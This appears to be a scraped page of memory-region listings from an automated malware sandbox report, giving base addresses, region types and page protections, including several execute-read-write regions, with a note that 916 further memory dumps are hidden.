|
unkown
|
page write copy
|
|
|
|
10001000
|
unkown image
|
page execute read
|
|
|
|
7FF00280000
|
unkown
|
page execute and read and write
|
|
|
|
220000
|
unkown
|
page read and write
|
|
|
|
10001000
|
unkown image
|
page execute read
|
|
|
|
3629000
|
unkown
|
page read and write
|
|
|
|
2A4000
|
heap default
|
page read and write
|
|
|
|
2157000
|
unkown
|
page readonly
|
|
|
|
2F70000
|
unkown
|
page readonly
|
|
|
|
44A000
|
heap default
|
page read and write
|
|
|
|
3033000
|
unkown
|
page read and write
|
|
|
|
3D7000
|
heap default
|
page read and write
|
|
|
|
410000
|
heap private
|
page read and write
|
|
|
|
8D0000
|
heap private
|
page read and write
|
|
|
|
2940000
|
unkown
|
page read and write
|
|
|
|
410000
|
heap private
|
page read and write
|
|
|
|
7FF00050000
|
unkown
|
page read and write
|
|
|
|
328000
|
unkown
|
page read and write
|
|
|
|
7FF00210000
|
unkown
|
page read and write
|
|
|
|
4ED000
|
heap default
|
page read and write
|
|
|
|
A90000
|
heap private
|
page read and write
|
|
|
|
319D000
|
stack
|
page read and write
|
|
|
|
2760000
|
unkown
|
page readonly
|
|
|
|
10042000
|
unkown image
|
page readonly
|
|
|
|
2494000
|
heap private
|
page read and write
|
|
|
|
232000
|
heap private
|
page read and write
|
|
|
|
60000
|
unkown
|
page readonly
|
|
|
|
460000
|
unkown
|
page readonly
|
|
|
|
1BBB0000
|
heap private
|
page read and write
|
|
|
|
30A1000
|
unkown
|
page read and write
|
|
|
|
AA2000
|
heap private
|
page read and write
|
|
|
|
20E000
|
unkown
|
page read and write
|
|
|
|
53D000
|
heap default
|
page read and write
|
|
|
|
3681000
|
unkown
|
page read and write
|
|
|
|
1B0000
|
unkown
|
page read and write
|
|
|
|
170000
|
unkown
|
page readonly
|
|
|
|
285E000
|
unkown
|
page read and write
|
|
|
|
4B0000
|
unkown
|
page readonly
|
|
|
|
1E1000
|
heap private
|
page read and write
|
|
|
|
27C000
|
unkown
|
page read and write
|
|
|
|
287000
|
heap default
|
page read and write
|
|
|
|
7EFDF000
|
unkown
|
page read and write
|
|
|
|
2CF000
|
heap default
|
page read and write
|
|
|
|
429000
|
heap default
|
page read and write
|
|
|
|
3619000
|
unkown
|
page read and write
|
|
|
|
978000
|
heap private
|
page read and write
|
|
|
|
A51000
|
heap private
|
page read and write
|
|
|
|
2DC000
|
heap default
|
page read and write
|
|
|
|
60000
|
unkown
|
page readonly
|
|
|
|
204000
|
heap private
|
page read and write
|
|
|
|
21C0000
|
heap private
|
page read and write
|
|
|
|
120000
|
unkown
|
page readonly
|
|
|
|
32A0000
|
heap private
|
page read and write
|
|
|
|
264C000
|
unkown
|
page read and write
|
|
|
|
3671000
|
unkown
|
page read and write
|
|
|
|
CAF000
|
stack
|
page read and write
|
|
|
|
2371000
|
heap private
|
page read and write
|
|
|
|
2280000
|
unkown
|
page readonly
|
|
|
|
3B01000
|
unkown
|
page read and write
|
|
|
|
D3E000
|
unkown
|
page read and write
|
|
|
|
2A4000
|
heap default
|
page read and write
|
|
|
|
2C1D000
|
stack
|
page read and write
|
|
|
|
2E8C000
|
unkown
|
page read and write
|
|
|
|
2157000
|
unkown
|
page readonly
|
|
|
|
767000
|
heap default
|
page read and write
|
|
|
|
1C0000
|
heap private
|
page read and write
|
|
|
|
1004F000
|
unkown image
|
page readonly
|
|
|
|
28B0000
|
unkown
|
page read and write
|
|
|
|
2480000
|
heap private
|
page read and write
|
|
|
|
20000
|
unkown
|
page readonly
|
|
|
|
7AC000
|
heap default
|
page read and write
|
|
|
|
25A000
|
stack
|
page read and write
|
|
|
|
94E000
|
stack
|
page read and write
|
|
|
|
7FF00142000
|
unkown
|
page execute and read and write
|
|
|
|
30EE000
|
stack
|
page read and write
|
|
|
|
3A0000
|
heap default
|
page read and write
|
|
|
|
10042000
|
unkown image
|
page readonly
|
|
|
|
3E0000
|
heap private
|
page read and write
|
|
|
|
B00000
|
heap private
|
page read and write
|
|
|
|
10000000
|
unkown image
|
page readonly
|
|
|
|
2684000
|
heap private
|
page read and write
|
|
|
|
3645000
|
unkown
|
page read and write
|
|
|
|
2976000
|
unkown
|
page read and write
|
|
|
|
10001000
|
unkown image
|
page execute read
|
|
|
|
2CF0000
|
unkown
|
page readonly
|
|
|
|
244E000
|
unkown
|
page read and write
|
|
|
|
6A0000
|
unkown
|
page readonly
|
|
|
|
B20000
|
unkown
|
page read and write
|
|
|
|
328000
|
unkown
|
page read and write
|
|
|
|
413000
|
heap default
|
page read and write
|
|
|
|
2350000
|
unkown
|
page read and write
|
|
|
|
2541000
|
heap private
|
page read and write
|
|
|
|
7FF0011A000
|
unkown
|
page execute and read and write
|
|
|
|
2CDF000
|
unkown
|
page read and write
|
|
|
|
405000
|
heap default
|
page read and write
|
|
|
|
10001000
|
unkown image
|
page execute read
|
|
|
|
E0000
|
unkown
|
page read and write
|
|
|
|
2FC6000
|
unkown
|
page read and write
|
|
|
|
17E000
|
unkown
|
page read and write
|
|
|
|
10042000
|
unkown image
|
page readonly
|
|
|
|
3A93000
|
unkown
|
page read and write
|
|
|
|
27E000
|
unkown
|
page read and write
|
|
|
|
2A50000
|
heap private
|
page read and write
|
|
|
|
3553000
|
unkown
|
page read and write
|
|
|
|
7FF00100000
|
unkown
|
page read and write
|
|
|
|
1EA000
|
stack
|
page read and write
|
|
|
|
4A0000
|
unkown
|
page readonly
|
|
|
|
2BBD000
|
unkown
|
page read and write
|
|
|
|
930000
|
unkown
|
page readonly
|
|
|
|
30BF000
|
unkown
|
page read and write
|
|
|
|
210000
|
heap private
|
page read and write
|
|
|
|
1BB30000
|
heap private
|
page read and write
|
|
|
|
7FF00042000
|
unkown
|
page execute and read and write
|
|
|
|
2D76000
|
unkown
|
page read and write
|
|
|
|
AAE000
|
unkown
|
page read and write
|
|
|
|
280000
|
unkown
|
page readonly
|
|
|
|
1CC000
|
unkown
|
page read and write
|
|
|
|
280000
|
heap default
|
page read and write
|
|
|
|
540000
|
unkown
|
page readonly
|
|
|
|
447000
|
heap default
|
page read and write
|
|
|
|
3DD000
|
heap default
|
page read and write
|
|
|
|
250000
|
unkown
|
page read and write
|
|
|
|
250000
|
unkown
|
page read and write
|
|
|
|
2F7A000
|
unkown
|
page read and write
|
|
|
|
1C16000
|
unkown
|
page read and write
|
|
|
|
2C6E000
|
stack
|
page read and write
|
|
|
|
A9E000
|
unkown
|
page read and write
|
|
|
|
20000
|
unkown
|
page readonly
|
|
|
|
24DE000
|
stack
|
page read and write
|
|
|
|
B21000
|
heap private
|
page read and write
|
|
|
|
359000
|
heap default
|
page read and write
|
|
|
|
AFE000
|
stack
|
page read and write
|
|
|
|
630000
|
unkown
|
page readonly
|
|
|
|
100000
|
unkown
|
page read and write
|
|
|
|
10001000
|
unkown image
|
page execute read
|
|
|
|
9F0000
|
heap private
|
page read and write
|
|
|
|
2C70000
|
unkown
|
page readonly
|
|
|
|
27AD000
|
unkown
|
page read and write
|
|
|
|
307C000
|
unkown
|
page read and write
|
|
|
|
93D000
|
unkown
|
page read and write
|
|
|
|
94F000
|
unkown
|
page read and write
|
|
|
|
910000
|
heap private
|
page read and write
|
|
|
|
350000
|
unkown
|
page readonly
|
|
|
|
28B0000
|
unkown
|
page read and write
|
|
|
|
10000000
|
unkown image
|
page readonly
|
|
|
|
10001000
|
unkown image
|
page execute read
|
|
|
|
2B80000
|
unkown
|
page readonly
|
|
|
|
327E000
|
stack
|
page read and write
|
|
|
|
830000
|
unkown
|
page readonly
|
|
|
|
B1F000
|
stack
|
page read and write
|
|
|
|
7FFFFF10000
|
unkown
|
page execute and read and write
|
|
|
|
2340000
|
unkown
|
page readonly
|
|
|
|
1F25000
|
heap private
|
page read and write
|
|
|
|
266C000
|
unkown
|
page read and write
|
|
|
|
32CE000
|
stack
|
page read and write
|
|
|
|
1BA6E000
|
unkown
|
page read and write
|
|
|
|
1EE000
|
unkown
|
page read and write
|
|
|
|
2350000
|
unkown
|
page readonly
|
|
|
|
7FF001B0000
|
unkown
|
page read and write
|
|
|
|
20000
|
heap private
|
page read and write
|
|
|
|
30B000
|
unkown
|
page read and write
|
|
|
|
21EE000
|
unkown
|
page read and write
|
|
|
|
810000
|
unkown
|
page readonly
|
|
|
|
19B000
|
unkown
|
page read and write
|
|
|
|
2F70000
|
unkown
|
page read and write
|
|
|
|
862000
|
heap private
|
page read and write
|
|
|
|
304000
|
heap default
|
page read and write
|
|
|
|
620000
|
unkown
|
page readonly
|
|
|
|
820000
|
unkown
|
page readonly
|
|
|
|
1E40000
|
unkown
|
page write copy
|
|
|
|
326E000
|
stack
|
page read and write
|
|
|
|
26FE000
|
unkown
|
page read and write
|
|
|
|
10001000
|
unkown image
|
page execute read
|
|
|
|
7EFDF000
|
unkown
|
page read and write
|
|
|
|
28A0000
|
unkown
|
page readonly
|
|
|
|
2D37000
|
heap private
|
page read and write
|
|
|
|
2BD000
|
heap default
|
page read and write
|
|
|
|
3F0000
|
unkown
|
page read and write
|
|
|
|
28CE000
|
unkown
|
page read and write
|
|
|
|
1C0000
|
unkown
|
page readonly
|
|
|
|
2350000
|
unkown
|
page read and write
|
|
|
|
B70000
|
unkown
|
page read and write
|
|
|
|
280000
|
heap private
|
page read and write
|
|
|
|
414000
|
heap private
|
page read and write
|
|
|
|
35C7000
|
unkown
|
page read and write
|
|
|
|
2F77000
|
unkown
|
page read and write
|
|
|
|
10042000
|
unkown image
|
page readonly
|
|
|
|
844000
|
heap private
|
page read and write
|
|
|
|
7FF002B0000
|
unkown
|
page execute and read and write
|
|
|
|
30F000
|
unkown
|
page read and write
|
|
|
|
20000
|
unkown
|
page readonly
|
|
|
|
4B2000
|
heap private
|
page read and write
|
|
|
|
270000
|
unkown
|
page readonly
|
|
|
|
1AB000
|
unkown
|
page read and write
|
|
|
|
76D000
|
heap default
|
page read and write
|
|
|
|
324E000
|
stack
|
page read and write
|
|
|
|
384000
|
heap default
|
page read and write
|
|
|
|
3276000
|
unkown
|
page read and write
|
|
|
|
10000000
|
unkown image
|
page readonly
|
|
|
|
2590000
|
unkown
|
page write copy
|
|
|
|
23B000
|
stack
|
page read and write
|
|
|
|
20000
|
unkown
|
page readonly
|
|
|
|
3D7000
|
heap default
|
page read and write
|
|
|
|
2AC0000
|
heap private
|
page execute and read and write
|
|
|
|
28AE000
|
unkown
|
page read and write
|
|
|
|
3112000
|
unkown
|
page read and write
|
|
|
|
150000
|
unkown
|
page read and write
|
|
|
|
2B0000
|
heap default
|
page read and write
|
|
|
|
290000
|
heap default
|
page read and write
|
|
|
|
31BE000
|
unkown
|
page read and write
|
|
|
|
1F0000
|
unkown
|
page read and write
|
|
|
|
2770000
|
unkown
|
page read and write
|
|
|
|
420000
|
unkown
|
page read and write
|
|
|
|
214000
|
heap private
|
page read and write
|
|
|
|
120000
|
unkown
|
page readonly
|
|
|
|
5E0000
|
unkown
|
page readonly
|
|
|
|
232E000
|
unkown
|
page read and write
|
|
|
|
24B2000
|
heap private
|
page read and write
|
|
|
|
367000
|
heap default
|
page read and write
|
|
|
|
32AF000
|
stack
|
page read and write
|
|
|
|
301E000
|
unkown
|
page read and write
|
|
|
|
34E0000
|
unkown
|
page readonly
|
|
|
|
AFE000
|
stack
|
page read and write
|
|
|
|
3ED000
|
heap default
|
page read and write
|
|
|
|
2A0000
|
heap default
|
page read and write
|
|
|
|
28B0000
|
unkown
|
page read and write
|
|
|
|
F0000
|
unkown
|
page write copy
|
|
|
|
2520000
|
heap private
|
page read and write
|
|
|
|
28B0000
|
unkown
|
page read and write
|
|
|
|
10000000
|
unkown image
|
page readonly
|
|
|
|
3A7000
|
heap default
|
page read and write
|
|
|
|
10042000
|
unkown image
|
page readonly
|
|
|
|
2230000
|
heap private
|
page read and write
|
|
|
|
16B000
|
unkown
|
page read and write
|
|
|
|
920000
|
unkown
|
page readonly
|
|
|
|
2D20000
|
unkown
|
page read and write
|
|
|
|
7FF0005C000
|
unkown
|
page execute and read and write
|
|
|
|
28B0000
|
unkown
|
page read and write
|
|
|
|
3037000
|
unkown
|
page read and write
|
|
|
|
3289000
|
unkown
|
page read and write
|
|
|
|
3ACD000
|
unkown
|
page read and write
|
|
|
|
160000
|
unkown
|
page read and write
|
|
|
|
397000
|
heap default
|
page read and write
|
|
|
|
240000
|
unkown
|
page read and write
|
|
|
|
293F000
|
unkown
|
page read and write
|
|
|
|
B3E000
|
unkown
|
page read and write
|
|
|
|
2E10000
|
unkown
|
page readonly
|
|
|
|
D0000
|
unkown
|
page readonly
|
|
|
|
260000
|
unkown
|
page read and write
|
|
|
|
302A000
|
unkown
|
page read and write
|
|
|
|
1B0000
|
heap private
|
page read and write
|
|
|
|
10000000
|
unkown image
|
page readonly
|
|
|
|
28B0000
|
unkown
|
page read and write
|
|
|
|
460000
|
unkown
|
page readonly
|
|
|
|
233D000
|
unkown
|
page read and write
|
|
|
|
320000
|
unkown
|
page readonly
|
|
|
|
3293000
|
unkown
|
page read and write
|
|
|
|
1C0000
|
unkown
|
page readonly
|
|
|
|
4D0000
|
heap private
|
page read and write
|
|
|
|
7FF00220000
|
unkown
|
page read and write
|
|
|
|
28B0000
|
unkown
|
page read and write
|
|
|
|
31DE000
|
unkown
|
page read and write
|
|
|
|
39EC000
|
unkown
|
page read and write
|
|
|
|
10000000
|
unkown image
|
page readonly
|
|
|
|
4B0000
|
heap default
|
page read and write
|
|
|
|
860000
|
unkown
|
page readonly
|
|
|
|
2B50000
|
unkown
|
page readonly
|
|
|
|
2CA0000
|
unkown
|
page readonly
|
|
|
|
7C0000
|
unkown
|
page readonly
|
|
|
|
800000
|
heap private
|
page read and write
|
|
|
|
2940000
|
unkown
|
page readonly
|
|
|
|
764000
|
heap private
|
page read and write
|
|
|
|
23BE000
|
unkown
|
page read and write
|
|
|
|
28B0000
|
unkown
|
page read and write
|
|
|
|
A5E000
|
unkown
|
page read and write
|
|
|
|
12E51000
|
unkown
|
page read and write
|
|
|
|
7FF00200000
|
unkown
|
page execute and read and write
|
|
|
|
1EC7000
|
unkown
|
page readonly
|
|
|
|
7FF00250000
|
unkown
|
page execute and read and write
|
|
|
|
310000
|
heap private
|
page read and write
|
|
|
|
220000
|
unkown
|
page read and write
|
|
|
|
28B0000
|
unkown
|
page read and write
|
|
|
|
79D000
|
heap default
|
page read and write
|
|
|
|
8F0000
|
unkown
|
page readonly
|
|
|
|
3694000
|
unkown
|
page read and write
|
|
|
|
3495000
|
unkown
|
page read and write
|
|
|
|
880000
|
unkown
|
page readonly
|
|
|
|
B04000
|
heap private
|
page read and write
|
|
|
|
313000
|
unkown
|
page read and write
|
|
|
|
3655000
|
unkown
|
page read and write
|
|
|
|
2357000
|
unkown
|
page readonly
|
|
|
|
312E000
|
stack
|
page read and write
|
|
|
|
310F000
|
unkown
|
page read and write
|
|
|
|
1FA0000
|
unkown
|
page readonly
|
|
|
|
1004D000
|
unkown image
|
page read and write
|
|
|
|
2C00000
|
unkown
|
page readonly
|
|
|
|
2157000
|
unkown
|
page readonly
|
|
|
|
316000
|
unkown
|
page read and write
|
|
|
|
28B0000
|
unkown
|
page read and write
|
|
|
|
12D45000
|
unkown
|
page read and write
|
|
|
|
2730000
|
heap private
|
page read and write
|
|
There are 916 hidden memdumps, click here to show them.